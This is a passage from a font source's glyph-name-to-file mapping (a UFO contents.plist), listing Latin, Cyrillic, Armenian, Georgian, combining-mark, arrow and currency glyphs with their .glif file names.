<string>propersuperset.glif</string> <key>proportional</key> <string>proportional.glif</string> <key>psi</key> <string>psi.glif</string> <key>q</key> <string>q.glif</string> <key>question</key> <string>question.glif</string> <key>questiondown</key> <string>questiondown.glif</string> <key>questiondown.case</key> <string>questiondown.case.glif</string> <key>quotedbl</key> <string>quotedbl.glif</string> <key>quotedblbase</key> <string>quotedblbase.glif</string> <key>quotedblleft</key> <string>quotedblleft.glif</string> <key>quotedblright</key> <string>quotedblright.glif</string> <key>quoteleft</key> <string>quoteleft.glif</string> <key>quotereversed</key> <string>quotereversed.glif</string> <key>quoteright</key> <string>quoteright.glif</string> <key>quotesinglbase</key> <string>quotesinglbase.glif</string> <key>quotesingle</key> <string>quotesingle.glif</string> <key>r</key> <string>r.glif</string> <key>racute</key> <string>racute.glif</string> <key>radical</key> <string>radical.glif</string> <key>rcaron</key> <string>rcaron.glif</string> <key>reflexsubset</key> <string>reflexsubset.glif</string> <key>reflexsuperset</key> <string>reflexsuperset.glif</string> <key>registered</key> <string>registered.glif</string> <key>revlogicalnot</key> <string>revlogicalnot.glif</string> <key>rho</key> <string>rho.glif</string> <key>ring</key> <string>ring.glif</string> <key>rtblock</key> <string>rtblock.glif</string> <key>s</key> <string>s.glif</string> <key>sacute</key> <string>sacute.glif</string> <key>scaron</key> <string>scaron.glif</string> <key>scedilla</key> <string>scedilla.glif</string> <key>scircumflex</key> <string>scircumflex.glif</string> <key>section</key> <string>section.glif</string> <key>semicolon</key> <string>semicolon.glif</string> <key>seven</key> <string>seven.glif</string> <key>seven.subs</key> <string>seven.subs.glif</string> <key>seveneighths</key> <string>seveneighths.glif</string> <key>shade</key> <string>shade.glif</string> <key>sigma</key> <string>sigma.glif</string> <key>similar</key> <string>similar.glif</string> <key>six</key> <string>six.glif</string> <key>six.subs</key> <string>six.subs.glif</string> <key>slash</key> <string>slash.glif</string> <key>space</key> <string>space.glif</string> <key>sterling</key> <string>sterling.glif</string> <key>suchthat</key> <string>suchthat.glif</string> <key>summation</key> <string>summation.glif</string> <key>t</key> <string>t.glif</string> <key>tau</key> <string>tau.glif</string> <key>tbar</key> <string>tbar.glif</string> <key>tcaron</key> <string>tcaron.glif</string> <key>therefore</key> <string>therefore.glif</string> <key>theta</key> <string>theta.glif</string> <key>thorn</key> <string>thorn.glif</string> <key>three</key> <string>three.glif</string> <key>three.subs</key> <string>three.subs.glif</string> <key>threeeighths</key> <string>threeeighths.glif</string> <key>threequarters</key> <string>threequarters.glif</string> <key>tilde</key> <string>tilde.glif</string> <key>tildecomb</key> <string>tildecomb.glif</string> <key>tonos</key> <string>tonos.glif</string> <key>trademark</key> <string>trademark.glif</string> <key>triagdn</key> <string>triagdn.glif</string> <key>triaglf</key> <string>triaglf.glif</string> <key>triagrt</key> <string>triagrt.glif</string> <key>triagup</key> <string>triagup.glif</string> <key>two</key> <string>two.glif</string> <key>two.subs</key> <string>two.subs.glif</string> <key>u</key> <string>u.glif</string> <key>uacute</key> <string>uacute.glif</string> <key>ubreve</key> <string>ubreve.glif</string> <key>ucircumflex</key> <string>ucircumflex.glif</string> <key>udieresis</key> <string>udieresis.glif</string> <key>ugrave</key> <string>ugrave.glif</string> <key>uhorn</key> <string>uhorn.glif</string> <key>uhungarumlaut</key> <string>uhungarumlaut.glif</string> <key>umacron</key> <string>umacron.glif</string> <key>underscore</key> <string>underscore.glif</string> <key>underscoredbl</key> <string>underscoredbl.glif</string> <key>uni00A0</key> <string>uni00A_0.glif</string> <key>uni00AD</key> <string>uni00A_D_.glif</string> <key>uni00B2</key> <string>uni00B_2.glif</string> <key>uni00B3</key> <string>uni00B_3.glif</string> <key>uni00B5</key> <string>uni00B_5.glif</string> <key>uni00B9</key> <string>uni00B_9.glif</string> <key>uni0122</key> <string>uni0122.glif</string> <key>uni0123</key> <string>uni0123.glif</string> <key>uni0136</key> <string>uni0136.glif</string> <key>uni0137</key> <string>uni0137.glif</string> <key>uni013B</key> <string>uni013B_.glif</string> <key>uni013C</key> <string>uni013C_.glif</string> <key>uni0145</key> <string>uni0145.glif</string> <key>uni0146</key> <string>uni0146.glif</string> <key>uni0156</key> <string>uni0156.glif</string> <key>uni0157</key> <string>uni0157.glif</string> <key>uni0162</key> <string>uni0162.glif</string> <key>uni0163</key> <string>uni0163.glif</string> <key>uni01A4</key> <string>uni01A_4.glif</string> <key>uni0218</key> <string>uni0218.glif</string> <key>uni0219</key> <string>uni0219.glif</string> <key>uni021A</key> <string>uni021A_.glif</string> <key>uni021B</key> <string>uni021B_.glif</string> <key>uni02B9</key> <string>uni02B_9.glif</string> <key>uni02BB</key> <string>uni02B_B_.glif</string> <key>uni02BC</key> <string>uni02B_C_.glif</string> <key>uni02BD</key> <string>uni02B_D_.glif</string> <key>uni02BE</key> <string>uni02B_E_.glif</string> <key>uni02BF</key> <string>uni02B_F_.glif</string> <key>uni02C0</key> <string>uni02C_0.glif</string> <key>uni02C1</key> <string>uni02C_1.glif</string> <key>uni02C8</key> <string>uni02C_8.glif</string> <key>uni02C9</key> <string>uni02C_9.glif</string> <key>uni02CC</key> <string>uni02C_C_.glif</string> <key>uni02CD</key> <string>uni02C_D_.glif</string> <key>uni02CE</key> <string>uni02C_E_.glif</string> <key>uni02CF</key> <string>uni02C_F_.glif</string> <key>uni02D0</key> <string>uni02D_0.glif</string> <key>uni02D1</key> <string>uni02D_1.glif</string> <key>uni0302</key> <string>uni0302.glif</string> <key>uni0304</key> <string>uni0304.glif</string> <key>uni0304.case</key> <string>uni0304.case.glif</string> <key>uni0305</key> <string>uni0305.glif</string> <key>uni0306</key> <string>uni0306.glif</string> <key>uni0306.case</key> <string>uni0306.case.glif</string> <key>uni0307</key> <string>uni0307.glif</string> <key>uni0307.case</key> <string>uni0307.case.glif</string> <key>uni0308</key> <string>uni0308.glif</string> <key>uni030A</key> <string>uni030A_.glif</string> <key>uni030B</key> <string>uni030B_.glif</string> <key>uni030B.case</key> <string>uni030B_.case.glif</string> <key>uni030C</key> <string>uni030C_.glif</string> <key>uni030D</key> <string>uni030D_.glif</string> <key>uni030E</key> <string>uni030E_.glif</string> <key>uni030F</key> <string>uni030F_.glif</string> <key>uni030F.case</key> <string>uni030F_.case.glif</string> <key>uni0310</key> <string>uni0310.glif</string> <key>uni0311</key> <string>uni0311.glif</string> <key>uni0311.case</key> <string>uni0311.case.glif</string> <key>uni0312</key> <string>uni0312.glif</string> <key>uni0313</key> <string>uni0313.glif</string> <key>uni0314</key> <string>uni0314.glif</string> <key>uni0315</key> <string>uni0315.glif</string> <key>uni0316</key> <string>uni0316.glif</string> <key>uni0317</key> <string>uni0317.glif</string> <key>uni0318</key> <string>uni0318.glif</string> <key>uni0319</key> <string>uni0319.glif</string> <key>uni031A</key> <string>uni031A_.glif</string> <key>uni031B</key> <string>uni031B_.glif</string> <key>uni031C</key> <string>uni031C_.glif</string> <key>uni031D</key> <string>uni031D_.glif</string> <key>uni031E</key> <string>uni031E_.glif</string> <key>uni031F</key> <string>uni031F_.glif</string> <key>uni0320</key> <string>uni0320.glif</string> <key>uni0321</key> <string>uni0321.glif</string> <key>uni0322</key> <string>uni0322.glif</string> <key>uni0324</key> <string>uni0324.glif</string> <key>uni0325</key> <string>uni0325.glif</string> <key>uni0326</key> <string>uni0326.glif</string> <key>uni0327</key> <string>uni0327.glif</string> <key>uni0328</key> <string>uni0328.glif</string> <key>uni0329</key> <string>uni0329.glif</string> <key>uni032A</key> <string>uni032A_.glif</string> <key>uni032B</key> <string>uni032B_.glif</string> <key>uni032C</key> <string>uni032C_.glif</string> <key>uni032D</key> <string>uni032D_.glif</string> <key>uni032E</key> <string>uni032E_.glif</string> <key>uni032F</key> <string>uni032F_.glif</string> <key>uni0330</key> <string>uni0330.glif</string> <key>uni0331</key> <string>uni0331.glif</string> <key>uni0332</key> <string>uni0332.glif</string> <key>uni0333</key> <string>uni0333.glif</string> <key>uni0334</key> <string>uni0334.glif</string> <key>uni0335</key> <string>uni0335.glif</string> <key>uni0336</key> <string>uni0336.glif</string> <key>uni0337</key> <string>uni0337.glif</string> <key>uni0338</key> <string>uni0338.glif</string> <key>uni0339</key> <string>uni0339.glif</string> <key>uni033A</key> <string>uni033A_.glif</string> <key>uni033B</key> <string>uni033B_.glif</string> <key>uni033C</key> <string>uni033C_.glif</string> <key>uni033D</key> <string>uni033D_.glif</string> <key>uni033E</key> <string>uni033E_.glif</string> <key>uni033F</key> <string>uni033F_.glif</string> <key>uni0358</key> <string>uni0358.glif</string> <key>uni0361</key> <string>uni0361.glif</string> <key>uni0394</key> <string>uni0394.glif</string> <key>uni03A9</key> <string>uni03A_9.glif</string> <key>uni03BC</key> <string>uni03B_C_.glif</string> <key>uni03C2</key> <string>uni03C_2.glif</string> <key>uni03F4</key> <string>uni03F_4.glif</string> <key>uni0400</key> <string>uni0400.glif</string> <key>uni0401</key> <string>uni0401.glif</string> <key>uni0402</key> <string>uni0402.glif</string> <key>uni0403</key> <string>uni0403.glif</string> <key>uni0404</key> <string>uni0404.glif</string> <key>uni0405</key> <string>uni0405.glif</string> <key>uni0406</key> <string>uni0406.glif</string> <key>uni0407</key> <string>uni0407.glif</string> <key>uni0408</key> <string>uni0408.glif</string> <key>uni0409</key> <string>uni0409.glif</string> <key>uni040A</key> <string>uni040A_.glif</string> <key>uni040B</key> <string>uni040B_.glif</string> <key>uni040C</key> <string>uni040C_.glif</string> <key>uni040D</key> <string>uni040D_.glif</string> <key>uni040E</key> <string>uni040E_.glif</string> <key>uni040F</key> <string>uni040F_.glif</string> <key>uni0410</key> <string>uni0410.glif</string> <key>uni0411</key> <string>uni0411.glif</string> <key>uni0412</key> <string>uni0412.glif</string> <key>uni0413</key> <string>uni0413.glif</string> <key>uni0414</key> <string>uni0414.glif</string> <key>uni0415</key> <string>uni0415.glif</string> <key>uni0416</key> <string>uni0416.glif</string> <key>uni0417</key> <string>uni0417.glif</string> <key>uni0418</key> <string>uni0418.glif</string> <key>uni0419</key> <string>uni0419.glif</string> <key>uni041A</key> <string>uni041A_.glif</string> <key>uni041B</key> <string>uni041B_.glif</string> <key>uni041C</key> <string>uni041C_.glif</string> <key>uni041D</key> <string>uni041D_.glif</string> <key>uni041E</key> <string>uni041E_.glif</string> <key>uni041F</key> <string>uni041F_.glif</string> <key>uni0420</key> <string>uni0420.glif</string> <key>uni0421</key> <string>uni0421.glif</string> <key>uni0422</key> <string>uni0422.glif</string> <key>uni0423</key> <string>uni0423.glif</string> <key>uni0424</key> <string>uni0424.glif</string> <key>uni0425</key> <string>uni0425.glif</string> <key>uni0426</key> <string>uni0426.glif</string> <key>uni0427</key> <string>uni0427.glif</string> <key>uni0428</key> <string>uni0428.glif</string> <key>uni0429</key> <string>uni0429.glif</string> <key>uni042A</key> <string>uni042A_.glif</string> <key>uni042B</key> <string>uni042B_.glif</string> <key>uni042C</key> <string>uni042C_.glif</string> <key>uni042D</key> <string>uni042D_.glif</string> <key>uni042E</key> <string>uni042E_.glif</string> <key>uni042F</key> <string>uni042F_.glif</string> <key>uni0430</key> <string>uni0430.glif</string> <key>uni0431</key> <string>uni0431.glif</string> <key>uni0432</key> <string>uni0432.glif</string> <key>uni0433</key> <string>uni0433.glif</string> <key>uni0434</key> <string>uni0434.glif</string> <key>uni0435</key> <string>uni0435.glif</string> <key>uni0436</key> <string>uni0436.glif</string> <key>uni0437</key> <string>uni0437.glif</string> <key>uni0438</key> <string>uni0438.glif</string> <key>uni0439</key> <string>uni0439.glif</string> <key>uni043A</key> <string>uni043A_.glif</string> <key>uni043B</key> <string>uni043B_.glif</string> <key>uni043C</key> <string>uni043C_.glif</string> <key>uni043D</key> <string>uni043D_.glif</string> <key>uni043E</key> <string>uni043E_.glif</string> <key>uni043F</key> <string>uni043F_.glif</string> <key>uni0440</key> <string>uni0440.glif</string> <key>uni0441</key> <string>uni0441.glif</string> <key>uni0442</key> <string>uni0442.glif</string> <key>uni0443</key> <string>uni0443.glif</string> <key>uni0444</key> <string>uni0444.glif</string> <key>uni0445</key> <string>uni0445.glif</string> <key>uni0446</key> <string>uni0446.glif</string> <key>uni0447</key> <string>uni0447.glif</string> <key>uni0448</key> <string>uni0448.glif</string> <key>uni0449</key> <string>uni0449.glif</string> <key>uni044A</key> <string>uni044A_.glif</string> <key>uni044B</key> <string>uni044B_.glif</string> <key>uni044C</key> <string>uni044C_.glif</string> <key>uni044D</key> <string>uni044D_.glif</string> <key>uni044E</key> <string>uni044E_.glif</string> <key>uni044F</key> <string>uni044F_.glif</string> <key>uni0450</key> <string>uni0450.glif</string> <key>uni0451</key> <string>uni0451.glif</string> <key>uni0452</key> <string>uni0452.glif</string> <key>uni0453</key> <string>uni0453.glif</string> <key>uni0454</key> <string>uni0454.glif</string> <key>uni0455</key> <string>uni0455.glif</string> <key>uni0456</key> <string>uni0456.glif</string> <key>uni0457</key> <string>uni0457.glif</string> <key>uni0458</key> <string>uni0458.glif</string> <key>uni0459</key> <string>uni0459.glif</string> <key>uni045A</key> <string>uni045A_.glif</string> <key>uni045B</key> <string>uni045B_.glif</string> <key>uni045C</key> <string>uni045C_.glif</string> <key>uni045D</key> <string>uni045D_.glif</string> <key>uni045E</key> <string>uni045E_.glif</string> <key>uni045F</key> <string>uni045F_.glif</string> <key>uni0462</key> <string>uni0462.glif</string> <key>uni0463</key> <string>uni0463.glif</string> <key>uni0472</key> <string>uni0472.glif</string> <key>uni0473</key> <string>uni0473.glif</string> <key>uni0490</key> <string>uni0490.glif</string> <key>uni0491</key> <string>uni0491.glif</string> <key>uni0492</key> <string>uni0492.glif</string> <key>uni0493</key> <string>uni0493.glif</string> <key>uni0494</key> <string>uni0494.glif</string> <key>uni0495</key> <string>uni0495.glif</string> <key>uni0496</key> <string>uni0496.glif</string> <key>uni0497</key> <string>uni0497.glif</string> <key>uni0498</key> <string>uni0498.glif</string> <key>uni0499</key> <string>uni0499.glif</string> <key>uni049A</key> <string>uni049A_.glif</string> <key>uni049B</key> <string>uni049B_.glif</string> <key>uni04A2</key> <string>uni04A_2.glif</string> <key>uni04A3</key> <string>uni04A_3.glif</string> <key>uni04A4</key> <string>uni04A_4.glif</string> <key>uni04A5</key> <string>uni04A_5.glif</string> <key>uni04AA</key> <string>uni04A_A_.glif</string> <key>uni04AB</key> <string>uni04A_B_.glif</string> <key>uni04AC</key> <string>uni04A_C_.glif</string> <key>uni04AD</key> <string>uni04A_D_.glif</string> <key>uni04AE</key> <string>uni04A_E_.glif</string> <key>uni04AF</key> <string>uni04A_F_.glif</string> <key>uni04B0</key> <string>uni04B_0.glif</string> <key>uni04B1</key> <string>uni04B_1.glif</string> <key>uni04B2</key> <string>uni04B_2.glif</string> <key>uni04B3</key> <string>uni04B_3.glif</string> <key>uni04BA</key> <string>uni04B_A_.glif</string> <key>uni04BB</key> <string>uni04B_B_.glif</string> <key>uni04C0</key> <string>uni04C_0.glif</string> <key>uni04C1</key> <string>uni04C_1.glif</string> <key>uni04C2</key> <string>uni04C_2.glif</string> <key>uni04C3</key> <string>uni04C_3.glif</string> <key>uni04C4</key> <string>uni04C_4.glif</string> <key>uni04C7</key> <string>uni04C_7.glif</string> <key>uni04C8</key> <string>uni04C_8.glif</string> <key>uni04CB</key> <string>uni04C_B_.glif</string> <key>uni04CC</key> <string>uni04C_C_.glif</string> <key>uni04CF</key> <string>uni04C_F_.glif</string> <key>uni04D0</key> <string>uni04D_0.glif</string> <key>uni04D1</key> <string>uni04D_1.glif</string> <key>uni04D2</key> <string>uni04D_2.glif</string> <key>uni04D3</key> <string>uni04D_3.glif</string> <key>uni04D4</key> <string>uni04D_4.glif</string> <key>uni04D5</key> <string>uni04D_5.glif</string> <key>uni04D6</key> <string>uni04D_6.glif</string> <key>uni04D7</key> <string>uni04D_7.glif</string> <key>uni04D8</key> <string>uni04D_8.glif</string> <key>uni04D9</key> <string>uni04D_9.glif</string> <key>uni04DA</key> <string>uni04D_A_.glif</string> <key>uni04DB</key> <string>uni04D_B_.glif</string> <key>uni04DC</key> <string>uni04D_C_.glif</string> <key>uni04DD</key> <string>uni04D_D_.glif</string> <key>uni04DE</key> <string>uni04D_E_.glif</string> <key>uni04DF</key> <string>uni04D_F_.glif</string> <key>uni04E0</key> <string>uni04E_0.glif</string> <key>uni04E1</key> <string>uni04E_1.glif</string> <key>uni04E2</key> <string>uni04E_2.glif</string> <key>uni04E3</key> <string>uni04E_3.glif</string> <key>uni04E4</key> <string>uni04E_4.glif</string> <key>uni04E5</key> <string>uni04E_5.glif</string> <key>uni04E6</key> <string>uni04E_6.glif</string> <key>uni04E7</key> <string>uni04E_7.glif</string> <key>uni04E8</key> <string>uni04E_8.glif</string> <key>uni04E9</key> <string>uni04E_9.glif</string> <key>uni04EA</key> <string>uni04E_A_.glif</string> <key>uni04EB</key> <string>uni04E_B_.glif</string> <key>uni04EC</key> <string>uni04E_C_.glif</string> <key>uni04ED</key> <string>uni04E_D_.glif</string> <key>uni04EE</key> <string>uni04E_E_.glif</string> <key>uni04EF</key> <string>uni04E_F_.glif</string> <key>uni04F0</key> <string>uni04F_0.glif</string> <key>uni04F1</key> <string>uni04F_1.glif</string> <key>uni04F2</key> <string>uni04F_2.glif</string> <key>uni04F3</key> <string>uni04F_3.glif</string> <key>uni04F4</key> <string>uni04F_4.glif</string> <key>uni04F5</key> <string>uni04F_5.glif</string> <key>uni04F6</key> <string>uni04F_6.glif</string> <key>uni04F7</key> <string>uni04F_7.glif</string> <key>uni04F8</key> <string>uni04F_8.glif</string> <key>uni04F9</key> <string>uni04F_9.glif</string> <key>uni0510</key> <string>uni0510.glif</string> <key>uni0511</key> <string>uni0511.glif</string> <key>uni051A</key> <string>uni051A_.glif</string> <key>uni051B</key> <string>uni051B_.glif</string> <key>uni051C</key> <string>uni051C_.glif</string> <key>uni051D</key> <string>uni051D_.glif</string> <key>uni0531</key> <string>uni0531.glif</string> <key>uni0532</key> <string>uni0532.glif</string> <key>uni0533</key> <string>uni0533.glif</string> <key>uni0534</key> <string>uni0534.glif</string> <key>uni0535</key> <string>uni0535.glif</string> <key>uni0536</key> <string>uni0536.glif</string> <key>uni0537</key> <string>uni0537.glif</string> <key>uni0538</key> <string>uni0538.glif</string> <key>uni0539</key> <string>uni0539.glif</string> <key>uni053A</key> <string>uni053A_.glif</string> <key>uni053B</key> <string>uni053B_.glif</string> <key>uni053C</key> <string>uni053C_.glif</string> <key>uni053D</key> <string>uni053D_.glif</string> <key>uni053E</key> <string>uni053E_.glif</string> <key>uni053F</key> <string>uni053F_.glif</string> <key>uni0540</key> <string>uni0540.glif</string> <key>uni0541</key> <string>uni0541.glif</string> <key>uni0542</key> <string>uni0542.glif</string> <key>uni0543</key> <string>uni0543.glif</string> <key>uni0544</key> <string>uni0544.glif</string> <key>uni0545</key> <string>uni0545.glif</string> <key>uni0546</key> <string>uni0546.glif</string> <key>uni0547</key> <string>uni0547.glif</string> <key>uni0548</key> <string>uni0548.glif</string> <key>uni0549</key> <string>uni0549.glif</string> <key>uni054A</key> <string>uni054A_.glif</string> <key>uni054B</key> <string>uni054B_.glif</string> <key>uni054C</key> <string>uni054C_.glif</string> <key>uni054D</key> <string>uni054D_.glif</string> <key>uni054E</key> <string>uni054E_.glif</string> <key>uni054F</key> <string>uni054F_.glif</string> <key>uni0550</key> <string>uni0550.glif</string> <key>uni0551</key> <string>uni0551.glif</string> <key>uni0552</key> <string>uni0552.glif</string> <key>uni0553</key> <string>uni0553.glif</string> <key>uni0554</key> <string>uni0554.glif</string> <key>uni0555</key> <string>uni0555.glif</string> <key>uni0556</key> <string>uni0556.glif</string> <key>uni0559</key> <string>uni0559.glif</string> <key>uni055A</key> <string>uni055A_.glif</string> <key>uni055B</key> <string>uni055B_.glif</string> <key>uni055C</key> <string>uni055C_.glif</string> <key>uni055D</key> <string>uni055D_.glif</string> <key>uni055E</key> <string>uni055E_.glif</string> <key>uni055F</key> <string>uni055F_.glif</string> <key>uni0561</key> <string>uni0561.glif</string> <key>uni0562</key> <string>uni0562.glif</string> <key>uni0563</key> <string>uni0563.glif</string> <key>uni0564</key> <string>uni0564.glif</string> <key>uni0565</key> <string>uni0565.glif</string> <key>uni0566</key> <string>uni0566.glif</string> <key>uni0567</key> <string>uni0567.glif</string> <key>uni0568</key> <string>uni0568.glif</string> <key>uni0569</key> <string>uni0569.glif</string> <key>uni056A</key> <string>uni056A_.glif</string> <key>uni056B</key> <string>uni056B_.glif</string> <key>uni056C</key> <string>uni056C_.glif</string> <key>uni056D</key> <string>uni056D_.glif</string> <key>uni056E</key> <string>uni056E_.glif</string> <key>uni056F</key> <string>uni056F_.glif</string> <key>uni0570</key> <string>uni0570.glif</string> <key>uni0571</key> <string>uni0571.glif</string> <key>uni0572</key> <string>uni0572.glif</string> <key>uni0573</key> <string>uni0573.glif</string> <key>uni0574</key> <string>uni0574.glif</string> <key>uni0575</key> <string>uni0575.glif</string> <key>uni0576</key> <string>uni0576.glif</string> <key>uni0577</key> <string>uni0577.glif</string> <key>uni0578</key> <string>uni0578.glif</string> <key>uni0579</key> <string>uni0579.glif</string> <key>uni057A</key> <string>uni057A_.glif</string> <key>uni057B</key> <string>uni057B_.glif</string> <key>uni057C</key> <string>uni057C_.glif</string> <key>uni057D</key> <string>uni057D_.glif</string> <key>uni057E</key> <string>uni057E_.glif</string> <key>uni057F</key> <string>uni057F_.glif</string> <key>uni0580</key> <string>uni0580.glif</string> <key>uni0581</key> <string>uni0581.glif</string> <key>uni0582</key> <string>uni0582.glif</string> <key>uni0583</key> <string>uni0583.glif</string> <key>uni0584</key> <string>uni0584.glif</string> <key>uni0585</key> <string>uni0585.glif</string> <key>uni0586</key> <string>uni0586.glif</string> <key>uni0587</key> <string>uni0587.glif</string> <key>uni0589</key> <string>uni0589.glif</string> <key>uni058A</key> <string>uni058A_.glif</string> <key>uni0E3F</key> <string>uni0E_3F_.glif</string> <key>uni10D0</key> <string>uni10D_0.glif</string> <key>uni10D1</key> <string>uni10D_1.glif</string> <key>uni10D2</key> <string>uni10D_2.glif</string> <key>uni10D3</key> <string>uni10D_3.glif</string> <key>uni10D4</key> <string>uni10D_4.glif</string> <key>uni10D5</key> <string>uni10D_5.glif</string> <key>uni10D6</key> <string>uni10D_6.glif</string> <key>uni10D7</key> <string>uni10D_7.glif</string> <key>uni10D8</key> <string>uni10D_8.glif</string> <key>uni10D9</key> <string>uni10D_9.glif</string> <key>uni10DA</key> <string>uni10D_A_.glif</string> <key>uni10DB</key> <string>uni10D_B_.glif</string> <key>uni10DC</key> <string>uni10D_C_.glif</string> <key>uni10DD</key> <string>uni10D_D_.glif</string> <key>uni10DE</key> <string>uni10D_E_.glif</string> <key>uni10DF</key> <string>uni10D_F_.glif</string> <key>uni10E0</key> <string>uni10E_0.glif</string> <key>uni10E1</key> <string>uni10E_1.glif</string> <key>uni10E2</key> <string>uni10E_2.glif</string> <key>uni10E3</key> <string>uni10E_3.glif</string> <key>uni10E4</key> <string>uni10E_4.glif</string> <key>uni10E5</key> <string>uni10E_5.glif</string> <key>uni10E6</key> <string>uni10E_6.glif</string> <key>uni10E7</key> <string>uni10E_7.glif</string> <key>uni10E8</key> <string>uni10E_8.glif</string> <key>uni10E9</key> <string>uni10E_9.glif</string> <key>uni10EA</key> <string>uni10E_A_.glif</string> <key>uni10EB</key> <string>uni10E_B_.glif</string> <key>uni10EC</key> <string>uni10E_C_.glif</string> <key>uni10ED</key> <string>uni10E_D_.glif</string> <key>uni10EE</key> <string>uni10E_E_.glif</string> <key>uni10EF</key> <string>uni10E_F_.glif</string> <key>uni10F0</key> <string>uni10F_0.glif</string> <key>uni10F1</key> <string>uni10F_1.glif</string> <key>uni10F2</key> <string>uni10F_2.glif</string> <key>uni10F3</key> <string>uni10F_3.glif</string> <key>uni10F4</key> <string>uni10F_4.glif</string> <key>uni10F5</key> <string>uni10F_5.glif</string> <key>uni10F6</key> <string>uni10F_6.glif</string> <key>uni10F7</key> <string>uni10F_7.glif</string> <key>uni10F8</key> <string>uni10F_8.glif</string> <key>uni10F9</key> <string>uni10F_9.glif</string> <key>uni10FA</key> <string>uni10F_A_.glif</string> <key>uni10FB</key> <string>uni10F_B_.glif</string> <key>uni10FC</key> <string>uni10F_C_.glif</string> <key>uni1EBC</key> <string>uni1E_B_C_.glif</string> <key>uni1EBD</key> <string>uni1E_B_D_.glif</string> <key>uni1EF8</key> <string>uni1E_F_8.glif</string> <key>uni1EF9</key> <string>uni1E_F_9.glif</string> <key>uni2000</key> <string>uni2000.glif</string> <key>uni2001</key> <string>uni2001.glif</string> <key>uni2002</key> <string>uni2002.glif</string> <key>uni2003</key> <string>uni2003.glif</string> <key>uni2004</key> <string>uni2004.glif</string> <key>uni2005</key> <string>uni2005.glif</string> <key>uni2006</key> <string>uni2006.glif</string> <key>uni2007</key> <string>uni2007.glif</string> <key>uni2008</key> <string>uni2008.glif</string> <key>uni2009</key> <string>uni2009.glif</string> <key>uni200A</key> <string>uni200A_.glif</string> <key>uni2010</key> <string>uni2010.glif</string> <key>uni2011</key> <string>uni2011.glif</string> <key>uni2015</key> <string>uni2015.glif</string> <key>uni2016</key> <string>uni2016.glif</string> <key>uni201F</key> <string>uni201F_.glif</string> <key>uni2023</key> <string>uni2023.glif</string> <key>hyphenationpoint</key> <string>hyphenationpoint.glif</string> <key>uni202F</key> <string>uni202F_.glif</string> <key>uni2031</key> <string>uni2031.glif</string> <key>minute</key> <string>minute.glif</string> <key>second</key> <string>second.glif</string> <key>millisecond</key> <string>millisecond.glif</string> <key>uni2035</key> <string>uni2035.glif</string> <key>uni2036</key> <string>uni2036.glif</string> <key>uni2037</key> <string>uni2037.glif</string> <key>uni203D</key> <string>uni203D_.glif</string> <key>uni203E</key> <string>uni203E_.glif</string> <key>uni203F</key> <string>uni203F_.glif</string> <key>uni2045</key> <string>uni2045.glif</string> <key>uni2046</key> <string>uni2046.glif</string> <key>uni2047</key> <string>uni2047.glif</string> <key>uni2048</key> <string>uni2048.glif</string> <key>uni2049</key> <string>uni2049.glif</string> <key>uni204B</key> <string>uni204B_.glif</string> <key>uni205F</key> <string>uni205F_.glif</string> <key>uni2070</key> <string>uni2070.glif</string> <key>uni2074</key> <string>uni2074.glif</string> <key>uni2075</key> <string>uni2075.glif</string> <key>uni2076</key> <string>uni2076.glif</string> <key>uni2077</key> <string>uni2077.glif</string> <key>uni2078</key> <string>uni2078.glif</string> <key>uni2079</key> <string>uni2079.glif</string> <key>uni207A</key> <string>uni207A_.glif</string> <key>uni207B</key> <string>uni207B_.glif</string> <key>uni207C</key> <string>uni207C_.glif</string> <key>uni207D</key> <string>uni207D_.glif</string> <key>uni207E</key> <string>uni207E_.glif</string> <key>uni208A</key> <string>uni208A_.glif</string> <key>uni208B</key> <string>uni208B_.glif</string> <key>uni208C</key> <string>uni208C_.glif</string> <key>uni208D</key> <string>uni208D_.glif</string> <key>uni208E</key> <string>uni208E_.glif</string> <key>uni20A0</key> <string>uni20A_0.glif</string> <key>uni20A2</key> <string>uni20A_2.glif</string> <key>uni20A5</key> <string>uni20A_5.glif</string> <key>uni20A6</key> <string>uni20A_6.glif</string> <key>uni20A8</key> <string>uni20A_8.glif</string> <key>uni20A9</key> <string>uni20A_9.glif</string> <key>uni20AA</key> <string>uni20A_A_.glif</string> <key>uni20B0</key> <string>uni20B_0.glif</string> <key>uni20B1</key> <string>uni20B_1.glif</string> <key>uni20B2</key> <string>uni20B_2.glif</string> <key>uni20B3</key> <string>uni20B_3.glif</string> <key>uni20B4</key> <string>uni20B_4.glif</string> <key>uni20B5</key> <string>uni20B_5.glif</string> <key>uni20B7</key> <string>uni20B_7.glif</string> <key>uni20B8</key> <string>uni20B_8.glif</string> <key>uni20B9</key> <string>uni20B_9.glif</string> <key>uni2116</key> <string>uni2116.glif</string> <key>uni2126</key> <string>uni2126.glif</string> <key>uni2150</key> <string>uni2150.glif</string> <key>uni2151</key> <string>uni2151.glif</string> <key>uni2153</key> <string>uni2153.glif</string> <key>uni2154</key> <string>uni2154.glif</string> <key>uni2155</key> <string>uni2155.glif</string> <key>uni2156</key> <string>uni2156.glif</string> <key>uni2157</key> <string>uni2157.glif</string> <key>uni2158</key> <string>uni2158.glif</string> <key>uni2159</key> <string>uni2159.glif</string> <key>uni215A</key> <string>uni215A_.glif</string> <key>uni215F</key> <string>uni215F_.glif</string> <key>uni2189</key> <string>uni2189.glif</string> <key>uni2196</key> <string>uni2196.glif</string> <key>uni2197</key> <string>uni2197.glif</string> <key>uni2198</key> <string>uni2198.glif</string> <key>uni2199</key> <string>uni2199.glif</string> <key>uni219A</key> <string>uni219A_.glif</string> <key>uni219B</key> <string>uni219B_.glif</string> <key>uni219C</key> <string>uni219C_.glif</string> <key>uni219D</key> <string>uni219D_.glif</string> <key>uni219E</key> <string>uni219E_.glif</string> <key>uni219F</key> <string>uni219F_.glif</string> <key>uni21A0</key> <string>uni21A_0.glif</string> <key>uni21A1</key> <string>uni21A_1.glif</string> <key>uni21A2</key> <string>uni21A_2.glif</string> <key>uni21A3</key> <string>uni21A_3.glif</string> <key>uni21A4</key> <string>uni21A_4.glif</string> <key>uni21A5</key> <string>uni21A_5.glif</string> <key>uni21A6</key> <string>uni21A_6.glif</string> <key>uni21A7</key> <string>uni21A_7.glif</string> <key>uni21A9</key> <string>uni21A_9.glif</string> <key>uni21AA</key> <string>uni21A_A_.glif</string> <key>uni21AB</key> <string>uni21A_B_.glif</string> <key>uni21AC</key> <string>uni21A_C_.glif</string> <key>uni21AD</key> <string>uni21A_D_.glif</string> <key>uni21AE</key> <string>uni21A_E_.glif</string> <key>uni21AF</key> <string>uni21A_F_.glif</string> <key>uni21B0</key> <string>uni21B_0.glif</string> <key>uni21B1</key> <string>uni21B_1.glif</string> <key>uni21B2</key> 